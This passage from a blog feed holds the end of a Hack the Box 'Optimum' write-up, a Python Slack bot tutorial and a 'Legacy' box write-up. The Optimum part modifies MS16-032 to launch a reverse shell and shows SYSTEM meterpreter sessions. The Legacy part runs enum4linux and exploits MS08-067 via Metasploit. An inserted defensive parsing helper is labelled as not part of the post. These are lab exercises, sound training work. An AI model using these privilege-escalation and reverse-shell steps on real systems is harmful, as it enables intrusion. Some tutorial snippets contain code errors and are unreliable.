            [ref]$StartupInfo, [ref]$ProcessInfo)
</code></pre></div></div>

<p>I needed to create another reverse shell with msfvenom and change that line in the MS16-032 script so the SYSTEM process it spawns is the reverse shell instead of cmd.exe.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
            0x00000002, "C:\Users\kostas\Desktop\yourrevshell.exe", "", #changed
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
</code></pre></div></div>

<p>I opened another handler in Metasploit to catch that reverse shell, which would give me SYSTEM on the box.</p>

<p>With the script modified and the handler running, it was time to execute the exploit from the interactive PowerShell.</p>

<p><strong>Reverse Powershell Tab</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PS C:\Users\kostas\Desktop&gt; ./MS16-032.ps1
PS C:\Users\kostas\Desktop&gt; Import-Module ./MS16-032.ps1
PS C:\Users\kostas\Desktop&gt; Invoke-MS16-032
__ __ ___ ___ ___ ___ ___ ___ 
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
 
[by b33f -&gt; @FuzzySec]

[?] Operating system core count: 2
[&gt;] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2172

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[&gt;] Wiping current impersonation token
[&gt;] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2168
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[&gt;] Duplicating SYSTEM token
[&gt;] Starting token race
[&gt;] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

PS C:\Users\kostas\Desktop&gt;
</code></pre></div></div>

<p>On the reverse shell handler tab, the shell launched by the exploit was caught, and there it is: SYSTEM on the box.</p>

<p><strong>Reverse Shell Tab</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(handler) &gt; 
[*] Sending stage (179267 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.116:1337 -&gt; 10.10.10.8:50253) at 2017-10-14 12:23:26 -0400

msf exploit(handler) &gt; sessions -i 1
[*] Starting interaction with 1...

meterpreter &gt; shell
Process 752 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop&gt;whoami
whoami
nt authority\system

C:\Users\kostas\Desktop&gt;more user.txt.txt
more user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73

C:\Users\kostas\Desktop&gt;cd C:\Users
cd C:\Users

C:\Users&gt;cd Administrator
cd Administrator

C:\Users\Administrator&gt;cd Desktop
cd Desktop

C:\Users\Administrator\Desktop&gt;more root.txt
more root.txt
51ed1b36553c8461f4552c2e92b3eeed

C:\Users\Administrator\Desktop&gt;
</code></pre></div></div>

<p>I have now the user and root hashes of the box.</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This is a write-up of the retired Optimum box on Hack the Box. First thing I did was to fire up nmap and ran this command. nmap -sV -sC -oA optimum 10.10.10.8 And got this result. Nmap scan report …]]></summary></entry><entry><title type="html">Building a Slack Bot with Python</title><link href="https://blog.anotsodev.me/2017/09/28/building-a-slack-bot-with-python.html" rel="alternate" type="text/html" title="Building a Slack Bot with Python" /><published>2017-09-28T00:00:00+00:00</published><updated>2017-09-28T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/09/28/building-a-slack-bot-with-python</id><content type="html" xml:base="https://blog.anotsodev.me/2017/09/28/building-a-slack-bot-with-python.html"><![CDATA[<p>The slack bot that I will be building has a feature that will automatically fetch the latest tweets from my subscribed lists (Information Security related) on Twitter.</p>

<p>Thanks to this guide I was able to understand how to build a simple slack bot.</p>

<p>https://www.fullstackpython.com/blog/build-first-slack-bot-python.html</p>

<h2 id="requirements">Requirements</h2>

<ol>
  <li>Python 2.x.x or 3.x.x</li>
  <li>Slack Account with a workspace to access the slack API</li>
  <li>slackclient python library</li>
  <li>Twitter account for the API access and subscribed with at least 1 list</li>
  <li>twitter python library</li>
</ol>

<h2 id="getting-started">Getting Started</h2>

<p>After installing either Python 2.x.x or 3.x.x, use the following commands to install the needed python libraries.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install slack client
pip install twitter
</code></pre></div></div>

<h2 id="getting-the-slack-api-access-token">Getting the Slack API Access Token</h2>

<p>After installing the libraries, log in to Slack and create a workspace so that you can generate Slack API tokens.</p>

<p>Click the site below to create new bot user.</p>

<p>https://api.slack.com/bot-users</p>

<p>Click “creating a new bot user”.</p>

<p>Below is the screenshot on creating a new bot user.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-bot-users.png?resize=654%2C365&amp;ssl=1" alt="Screenshot-2017-9-28 Bot Users" /></p>

<p>Enter the username of your bot.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-bots.png?resize=960%2C557&amp;ssl=1" alt="Screenshot-2017-9-28 Bots" /></p>

<p>You will be redirected here after you clicked the Add bot integration button.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-bots-slack-app-directory.png?resize=970%2C473&amp;ssl=1" alt="Screenshot-2017-9-28 Bots Slack App Directory" /></p>

<p>You have now the API token for your bot. Please note the warning message.</p>

<p>You can also customize your bot like uploading a profile picture and describing the features of your bot. After customizing your bot, scroll down and click the Save Integration button.</p>

<p>The most practical way to keep a secret token out of your source code is to export it as an environment variable.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export SLACK_BOT_TOKEN='your slack token pasted here'
</code></pre></div></div>

<p>What I will do instead is put the token in a config.py file and read it from the bot’s Python file. Keep config.py out of version control (add it to .gitignore), because the token grants full access to the bot user.</p>

<h2 id="getting-the-bots-id">Getting the Bot’s ID</h2>

<p>Here is the modified code snippet from https://www.fullstackpython.com/blog/build-first-slack-bot-python.html</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
from slackclient import SlackClient

config = {}
execfile("config.py", config)

BOT_NAME = 'kairubot'

slack_client = SlackClient(config['slack_api'])

if __name__ == "__main__":
    api_call = slack_client.api_call("users.list")
    if api_call.get('ok'):
    # retrieve all users so we can find our bot
    users = api_call.get('members')
       for user in users:
          if 'name' in user and user.get('name') == BOT_NAME:
              print("Bot ID for '" + user['name'] + "' is " + user.get('id'))
          else:
              print("could not find bot user with the name " + BOT_NAME)
</code></pre></div></div>

<p>Running this program will output the Bot’s ID.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\Kyle\Documents\Projects\slack-bot&gt;python test.py
Bot ID for 'kairubot' is U79K9K9FB
</code></pre></div></div>

<p>You can now copy and paste the ID of your bot to the config.py file.</p>

<p>Below is the template of the config.py file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Twitter Access Tokens
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""

# Slack Access Tokens
slack_api = ""
bot_id = "U772P5C83"
</code></pre></div></div>

<h2 id="getting-the-twitter-access-tokens">Getting the Twitter Access Tokens</h2>

<p>Now that we have the Slack API token and the ID of our bot, the next step is to get the tokens for user authentication needed to use the Twitter API.</p>

<p>Click the link below to generate these tokens.</p>

<p>https://apps.twitter.com/app/new</p>

<p>You must be logged in on twitter before creating an application.</p>

<p>You just need to fill up the following fields to create your new application.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-twitter-application-management.png?resize=1058%2C657&amp;ssl=1" alt="Screenshot-2017-9-28 Twitter Application Management" /></p>

<p>After filling in the necessary fields and creating your new application, you will be redirected to the application’s management page. To generate your access tokens, click the Keys and Access Tokens tab, scroll down, and click the Create new access token button.</p>

<p>Your application has now generated your access tokens. Paste them into config.py.</p>

<p>Example config.py</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Twitter Access Tokens
consumer_key = "k1v..."
consumer_secret = "HsDc..."
access_key = "770..."
access_secret = "5UN..."

#Slack Access Tokens
slack_api = "xoxb-"
bot_id = "U772P5C83"
</code></pre></div></div>

<p>You now have the tokens needed to make API requests to Slack and Twitter.</p>

<p>The program below retrieves the latest tweets from the subscribed lists.</p>

<p>I’ve used the examples here on how to use the Twitter API to get tweets from Twitter.</p>

<p>https://github.com/ideoforms</p>

<p>The feature of this bot is to manually or automatically fetch latest tweets from the subscribed lists.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import time
import sys
from slackclient import SlackClient
from twitter import *

config = {}
execfile("config.py", config)

#bot's id 
BOT_ID = config["bot_id"]

# instantiate slack
# Note: always secure the api token
slack_client = SlackClient(config["slack_api"])

AT_BOT = "&lt;@" + BOT_ID + "&gt;"

# list of commands
EXAMPLE_COMMANDS = "help, retrieve, autoretrieve"
COMMANDS = ['help', 'retrieve', 'autoretrieve']

#constants
DEFAULT_INTERVAL = 5

def auto_retrieve(channel, start, default_interval):
    n = default_interval;
    response = "Starting...\n"
    time.sleep(3)
    response += "Will retrieve statuses from the infosec list every 1 hour. Auto Retrieve Intervals = "+str(DEFAULT_INTERVAL)+"\n"
    slack_client.api_call("chat.postMessage", channel=channel,
                                  text=response, as_user=True)
    while start and n &gt; 0:
        response = retrieve()
        slack_client.api_call("chat.postMessage", channel=channel,
                                  text=response, as_user=True)
        n-=1
        # 3600 seconds = 1 hour
        time.sleep(3600)
    return "Auto retrieval stopped."

def retrieve():
    # will use this example on retrieving tweets https://github.com/ideoforms/python-twitter-examples/blob/master/twitter-home-timeline.py
    # config.py https://github.com/ideoforms/python-twitter-examples/blob/master/config.py
    response = ""
    response += "Retrieving 50 tweets... \n\n"

    users = [ "kylehalog" ]

    twitter = Twitter(auth = OAuth(config["access_key"], config["access_secret"], config["consumer_key"], config["consumer_secret"]))

    for user in users:
        result = twitter.lists.list(screen_name = user)
        for list in result:
            list_slug = list["slug"]
            list_str_id = list["id"]
            tweet_count = 50
            statuses = twitter.lists.statuses(slug = list_slug, list_id = list_str_id, count = tweet_count)
            for status in statuses:
                response += "(%s) @%s %s" % (status["created_at"], status["user"]["screen_name"], status["text"]) + "\n"
    return response

def command_handler(command, channel):

    response = "Sorry but I don't get what you mean. I can only understand these commands: " + EXAMPLE_COMMANDS
    if command in COMMANDS:
        if command == 'help':
            response = ("List of available commands: \n"
                        "help - display this message\n"
                        "retrieve - retrieve and output the latest tweets about infosec\n"
                        "autoretrieve - automatically retrieve and output tweets about infosec every 1 hour")

        elif command == 'retrieve':
            response = retrieve()

        elif command == 'autoretrieve':
            response = auto_retrieve(channel, True, DEFAULT_INTERVAL)

    slack_client.api_call("chat.postMessage", channel=channel,
                          text=response, as_user=True)


def slack_output_parser(rtm_output):
    # rtm_read() returns a list of events; look for a message that mentions the bot
    for output in rtm_output or []:
        if output and 'text' in output and AT_BOT in output['text']:
            # return text after the @ mention, whitespace removed and lower-cased
            return output['text'].split(AT_BOT)[1].strip().lower(), \
                   output['channel']
    return None, None

if __name__ == "__main__":
    READ_WEBSOCKET_DELAY = 1
    if slack_client.rtm_connect():
        print("Kairu Bot is connected and running!")
        while True:
            command, channel = slack_output_parser(slack_client.rtm_read())
            if command and channel:
                command_handler(command, channel)
            time.sleep(READ_WEBSOCKET_DELAY)
    else:
        print("Connection Failed. Invalid Slack token or Bot ID")
</code></pre></div></div>

<h2 id="starting-the-bot">Starting the Bot</h2>

<p>To run the program, just use this command and invite your bot to your Slack channel.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python kairu-bot.py
</code></pre></div></div>

<p>Example bot usage on slack</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/09/screenshot-2017-9-28-supersecretchannel-project-graduate-slack.png?resize=1127%2C495&amp;ssl=1" alt="Screenshot-2017-9-28 supersecretchannel Project Graduate Slack" /></p>

<p>So this is how to build a Slack bot with Python.</p>

<p>You are free to modify and use the source code on my GitHub below. You can also add as many features as you want.</p>

<p>https://github.com/anotsodev/slack-bot</p>

<p>Thank you for your time! 🙂</p>

<p><em>Featured Image credits to</em> <em><a href="https://www.wired.com/wp-content/uploads/2015/08/SlackBot-featured1.jpg">wired.com</a></em></p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[The slack bot that I will be building has a feature that will automatically fetch the latest tweets from my subscribed lists (Information Security related) on Twitter. Thanks to this guide I was ab…]]></summary></entry><entry><title type="html">Hack the Box Legacy Get System no Jutsu</title><link href="https://blog.anotsodev.me/2017/09/10/hack-the-box-legacy-get-system-no-jutsu.html" rel="alternate" type="text/html" title="Hack the Box Legacy Get System no Jutsu" /><published>2017-09-10T00:00:00+00:00</published><updated>2017-09-10T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/09/10/hack-the-box-legacy-get-system-no-jutsu</id><content type="html" xml:base="https://blog.anotsodev.me/2017/09/10/hack-the-box-legacy-get-system-no-jutsu.html"><![CDATA[<p>This post contains the actual commands that I used in hacking and getting the user and root hashes on HTB Legacy Box.</p>

<p><strong>Enumeration</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Downloads/enum4linux-0.8.9/enum4linux-0.8.9$ sudo ./enum4linux.pl -a 10.10.10.4
[sudo] password for kaipowered:
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 18 22:42:06 2017

==========================
| Target Information |
==========================
Target ........... 10.10.10.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==================================================
| Enumerating Workgroup/Domain on 10.10.10.4 |
==================================================
[+] Got domain/workgroup name: HTB

==========================================
| Nbtstat Information for 10.10.10.4 |
==========================================
Looking up status of 10.10.10.4
LEGACY &lt;00&gt; - B &lt;ACTIVE&gt; Workstation Service
HTB &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Domain/Workgroup Name
LEGACY &lt;20&gt; - B &lt;ACTIVE&gt; File Server Service
HTB &lt;1e&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Browser Service Elections
HTB &lt;1d&gt; - B &lt;ACTIVE&gt; Master Browser
..__MSBROWSE__. &lt;01&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt; Master Browser

MAC Address = 00-50-56-97-0E-E1

===================================
| Session Check on 10.10.10.4 |
===================================
[+] Server 10.10.10.4 allows sessions using username '', password ''

=========================================
| Getting domain SID for 10.10.10.4 |
=========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

====================================
| OS information on 10.10.10.4 |
====================================
[+] Got OS info for 10.10.10.4 from smbclient: Domain=[LEGACY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED

===========================
| Users on 10.10.10.4 |
===========================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

=======================================
| Share Enumeration on 10.10.10.4 |
=======================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

[+] Attempting to map shares on 10.10.10.4

==================================================
| Password Policy Information for 10.10.10.4 |
==================================================
[E] Unexpected error from polenum.py:
Traceback (most recent call last):
File "/usr/local/bin/polenum.py", line 32, in &lt;module&gt;
from impacket import uuid
ImportError: No module named impacket
[E] Failed to get password policy with rpcclient

============================
| Groups on 10.10.10.4 |
============================

[+] Getting builtin groups:
[E] Can't get builtin groups: NT_STATUS_ACCESS_DENIED

[+] Getting builtin group memberships:

[+] Getting local groups:
[E] Can't get local groups: NT_STATUS_ACCESS_DENIED

[+] Getting local group memberships:

[+] Getting domain groups:
[E] Can't get domain groups: NT_STATUS_ACCESS_DENIED

[+] Getting domain group memberships:

=====================================================================
| Users on 10.10.10.4 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

===========================================
| Getting printer info for 10.10.10.4 |
===========================================
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
could not obtain sid from server
error: NT_STATUS_ACCESS_DENIED

enum4linux complete on Tue Jul 18 22:42:49 2017
</code></pre></div></div>
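<p>The enum4linux run above already contains the facts a defender would act on: the host accepts an anonymous (null) SMB session, reports itself as <code>Windows 5.1</code> (Windows XP, which has been out of support since 2014), and denies most other anonymous RPC queries. As an added example that is not part of the post, here is a small Python helper that pulls those facts out of enum4linux output and turns them into findings. The sample input is a trimmed copy of the output above (NetBIOS table omitted), embedded as a constructed string so the code runs offline.</p>

```python
import re

# Constructed sample: a trimmed copy of the enum4linux output shown above.
SAMPLE_OUTPUT = """\
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 18 22:42:06 2017
Target ........... 10.10.10.4
[+] Got domain/workgroup name: HTB
[+] Server 10.10.10.4 allows sessions using username '', password ''
could not initialise lsa pipe. Error was NT_STATUS_ACCESS_DENIED
[+] Got OS info for 10.10.10.4 from smbclient: Domain=[LEGACY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
[E] Can't list shares: NT_STATUS_ACCESS_DENIED
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
enum4linux complete on Tue Jul 18 22:42:49 2017
"""

# NT version strings that smbclient reports for operating systems past end of support.
UNSUPPORTED_OS = {
    "Windows 5.0": "Windows 2000",
    "Windows 5.1": "Windows XP",
    "Windows 5.2": "Windows Server 2003 / XP x64",
}


def parse_enum4linux(text):
    """Pull the assessment-relevant facts out of enum4linux output."""
    facts = {"target": None, "workgroup": None, "null_session": False,
             "os": None, "denied": 0}
    for line in text.splitlines():
        m = re.match(r"Target \.+ (\S+)", line)
        if m:
            facts["target"] = m.group(1)
        m = re.search(r"Got domain/workgroup name: (\S+)", line)
        if m:
            facts["workgroup"] = m.group(1)
        if "allows sessions using username '', password ''" in line:
            facts["null_session"] = True
        m = re.search(r"OS=\[([^\]]+)\]", line)
        if m:
            facts["os"] = m.group(1)
        if "NT_STATUS_ACCESS_DENIED" in line:
            # each denied query is a place where anonymous enumeration was blocked
            facts["denied"] += 1
    return facts


def findings(facts):
    """Turn the parsed facts into defender-facing findings, highest severity first."""
    out = []
    if facts["os"] in UNSUPPORTED_OS:
        out.append("HIGH: SMB reports %s (%s), an end-of-life OS; isolate or retire it"
                   % (facts["os"], UNSUPPORTED_OS[facts["os"]]))
    if facts["null_session"]:
        out.append("MEDIUM: anonymous (null) SMB session accepted on %s; restrict anonymous access"
                   % facts["target"])
    if facts["denied"]:
        out.append("INFO: %d anonymous RPC queries denied; anonymous enumeration is partly restricted"
                   % facts["denied"])
    return out


if __name__ == "__main__":
    for f in findings(parse_enum4linux(SAMPLE_OUTPUT)):
        print(f)
```

<p>Run against the real tool, the same two functions take <code>enum4linux -a</code> output piped in from a file; the point of the HIGH finding is that an end-of-life SMB host on the network is the root cause of everything that follows in this writeup.</p>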

<p><strong>Exploitation and Post Exploitation</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(ms06_040_netapi) &gt; use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) &gt; show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) &gt; set RHOST 10.10.10.4
RHOST =&gt; 10.10.10.4
msf exploit(ms08_067_netapi) &gt; run

[*] Started reverse TCP handler on 10.10.15.172:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (956991 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.15.172:4444 -&gt; 10.10.10.4:1028) at 2017-07-18 22:26:33 +0800

meterpreter &gt; sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter &gt; whoami
[-] Unknown command: whoami.
meterpreter &gt; getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter &gt; shell
Process 1512 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32&gt;cd c:\Users
cd c:\Users
The system cannot find the path specified.

C:\WINDOWS\system32&gt;cd C
cd C
The system cannot find the path specified.

C:\WINDOWS\system32&gt;cd C:\
cd C:\

C:\&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\

16/03/2017 08:30 0 AUTOEXEC.BAT
16/03/2017 08:30 0 CONFIG.SYS
16/03/2017 09:07 &lt;DIR&gt; Documents and Settings
16/03/2017 08:33 &lt;DIR&gt; Program Files
16/03/2017 08:33 &lt;DIR&gt; WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.488.408.064 bytes free

C:\&gt;cd WINDOWS
cd WINDOWS

C:\WINDOWS&gt;dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS

16/03/2017 08:33 &lt;DIR&gt; .
16/03/2017 08:33 &lt;DIR&gt; ..
23/07/2017 07:19 0 0.log
16/03/2017 08:18 &lt;DIR&gt; addins
16/03/2017 08:19 &lt;DIR&gt; AppPatch
23/08/2001 03:00 1.272 Blue Lace 16.bmp
23/08/2001 03:00 82.944 clock.avi
16/03/2017 08:27 200 cmsetacl.log
23/08/2001 03:00 17.062 Coffee Bean.bmp
16/03/2017 08:32 15.905 comsetup.log
16/03/2017 08:18 &lt;DIR&gt; Config
16/03/2017 08:18 &lt;DIR&gt; Connection Wizard
16/03/2017 08:30 0 control.ini
16/03/2017 08:28 &lt;DIR&gt; Cursors
16/03/2017 08:20 &lt;DIR&gt; Debug
23/08/2001 03:00 2 desktop.ini
16/03/2017 08:18 &lt;DIR&gt; Driver Cache
16/03/2017 08:28 130 DtcInstall.log
16/03/2017 08:19 &lt;DIR&gt; ehome
14/04/2008 06:42 1.033.728 explorer.exe
23/08/2001 03:00 80 explorer.scf
16/03/2017 08:29 11.537 FaxSetup.log
23/08/2001 03:00 16.730 FeatherTexture.bmp
23/08/2001 03:00 17.336 Gone Fishing.bmp
23/08/2001 03:00 26.582 Greenstone.bmp
16/03/2017 08:29 &lt;DIR&gt; Help
14/04/2008 06:42 10.752 hh.exe
16/03/2017 08:32 48.335 iis6.log
16/03/2017 08:30 &lt;DIR&gt; ime
16/03/2017 08:32 4.382 imsins.log
16/03/2017 08:18 &lt;DIR&gt; java
16/03/2017 08:19 &lt;DIR&gt; L2Schemas
16/03/2017 08:29 1.487 MedCtrOC.log
16/03/2017 08:19 &lt;DIR&gt; Media
16/03/2017 08:19 &lt;DIR&gt; msagent
16/03/2017 08:18 &lt;DIR&gt; msapps
23/08/2001 03:00 1.405 msdfmap.ini
16/03/2017 08:29 871 msgsocm.log
16/03/2017 08:28 10.066 msmqinst.log
16/03/2017 08:19 &lt;DIR&gt; mui
16/03/2017 08:29 2.790 netfxocm.log
16/03/2017 08:19 &lt;DIR&gt; Network Diagnostic
14/04/2008 06:42 69.120 NOTEPAD.EXE
16/03/2017 08:32 7.948 ntdtcsetup.log
16/03/2017 08:29 14.772 ocgen.log
16/03/2017 08:32 885 ocmsn.log
16/03/2017 08:30 4.161 ODBCINST.INI
16/03/2017 09:07 1.178 OEWABLog.txt
16/03/2017 08:29 &lt;DIR&gt; Offline Web Pages
16/03/2017 08:29 &lt;DIR&gt; pchealth
16/03/2017 08:19 &lt;DIR&gt; PeerNet
23/08/2001 03:00 65.954 Prairie Wind.bmp
16/03/2017 09:18 &lt;DIR&gt; Prefetch
16/03/2017 08:18 &lt;DIR&gt; Provisioning
14/04/2008 06:42 146.432 regedit.exe
16/03/2017 08:30 &lt;DIR&gt; Registration
16/03/2017 08:32 8.192 REGLOCS.OLD
16/03/2017 08:24 1.690 regopt.log
16/03/2017 08:18 &lt;DIR&gt; repair
16/03/2017 08:18 &lt;DIR&gt; Resources
23/08/2001 03:00 17.362 Rhododendron.bmp
23/08/2001 03:00 26.680 River Sumida.bmp
23/08/2001 03:00 65.832 Santa Fe Stucco.bmp
11/05/2017 01:31 1.306 SchedLgU.Txt
16/03/2017 08:30 &lt;DIR&gt; security
16/03/2017 08:29 1.022 sessmgr.setup.log
14/04/2008 08:40 1.296.669 SET3.tmp
14/04/2008 08:34 1.088.840 SET4.tmp
14/04/2008 08:34 16.535 SET8.tmp
16/03/2017 08:32 159.934 setupact.log
11/05/2017 01:31 196.252 setupapi.log
16/03/2017 08:20 0 setuperr.log
16/03/2017 08:33 747.894 setuplog.txt
23/08/2001 03:00 65.978 Soap Bubbles.bmp
16/03/2017 08:33 &lt;DIR&gt; SoftwareDistribution
16/03/2017 08:29 &lt;DIR&gt; srchasst
16/03/2017 08:22 0 Sti_Trace.log
16/03/2017 08:20 &lt;DIR&gt; system
16/03/2017 08:20 231 system.ini
23/07/2017 07:23 &lt;DIR&gt; system32
16/03/2017 08:32 1.252 tabletoc.log
23/08/2001 03:00 15.360 TASKMAN.EXE
11/05/2017 01:30 &lt;DIR&gt; Temp
16/03/2017 08:32 10.801 tsoc.log
23/08/2001 03:00 94.784 twain.dll
16/03/2017 08:18 &lt;DIR&gt; twain_32
14/04/2008 06:42 50.688 twain_32.dll
23/08/2001 03:00 49.680 twunk_16.exe
23/08/2001 03:00 25.600 twunk_32.exe
16/03/2017 08:28 36 vb.ini
16/03/2017 08:28 37 vbaddin.ini
23/08/2001 03:00 18.944 vmmreg32.dll
16/03/2017 08:29 &lt;DIR&gt; Web
16/03/2017 08:22 501 wiadebug.log
16/03/2017 08:22 49 wiaservc.log
16/03/2017 08:30 477 win.ini
23/07/2017 07:24 11.076 WindowsUpdate.log
23/08/2001 03:00 256.192 winhelp.exe
14/04/2008 06:42 283.648 winhlp32.exe
16/03/2017 08:20 &lt;DIR&gt; WinSxS
16/03/2017 09:07 1.107 wmsetup.log
16/03/2017 08:30 316.640 WMSysPr9.prx
23/08/2001 03:00 9.522 Zapotec.bmp
23/08/2001 03:00 707 _default.pif
68 File(s) 6.455.564 bytes
36 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS&gt;dir system
dir system
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\system

16/03/2017 08:20 &lt;DIR&gt; .
16/03/2017 08:20 &lt;DIR&gt; ..
23/08/2001 03:00 69.584 AVICAP.DLL
23/08/2001 03:00 109.456 AVIFILE.DLL
23/08/2001 03:00 32.816 COMMDLG.DLL
23/08/2001 03:00 2.000 KEYBOARD.DRV
23/08/2001 03:00 9.936 LZEXPAND.DLL
23/08/2001 03:00 73.376 MCIAVI.DRV
23/08/2001 03:00 25.264 MCISEQ.DRV
23/08/2001 03:00 28.160 MCIWAVE.DRV
13/04/2008 11:24 68.768 MMSYSTEM.DLL
23/08/2001 03:00 1.152 MMTASK.TSK
23/08/2001 03:00 2.032 MOUSE.DRV
23/08/2001 03:00 126.912 MSVIDEO.DLL
23/08/2001 03:00 82.944 OLECLI.DLL
23/08/2001 03:00 24.064 OLESVR.DLL
23/08/2001 03:00 59.167 setup.inf
23/08/2001 03:00 5.120 SHELL.DLL
23/08/2001 03:00 1.744 SOUND.DRV
23/08/2001 03:00 5.532 stdole.tlb
23/08/2001 03:00 3.360 SYSTEM.DRV
23/08/2001 03:00 19.200 TAPI.DLL
23/08/2001 03:00 4.048 TIMER.DRV
23/08/2001 03:00 9.008 VER.DLL
23/08/2001 03:00 2.176 VGA.DRV
23/08/2001 03:00 13.600 WFWNET.DRV
14/04/2008 06:42 146.432 WINSPOOL.DRV
25 File(s) 925.851 bytes
2 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS&gt;dir ehome
dir ehome
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\ehome

16/03/2017 08:19 &lt;DIR&gt; .
16/03/2017 08:19 &lt;DIR&gt; ..
14/04/2008 06:41 33.792 custsat.dll
1 File(s) 33.792 bytes
2 Dir(s) 6.488.403.968 bytes free

C:\WINDOWS&gt;dir temp
dir temp
Volume in drive C has no label.
Volume Serial Number is 54BF-723B

Directory of C:\WINDOWS\temp

11/05/2017 01:30 &lt;DIR&gt; .
11/05/2017 01:30 &lt;DIR&gt; ..
0 File(s) 0 bytes
2 Dir(s) 6.488.395.776 bytes free

C:\WINDOWS&gt;cd ..
cd ..

C:\&gt;cd "Documents and Settings"
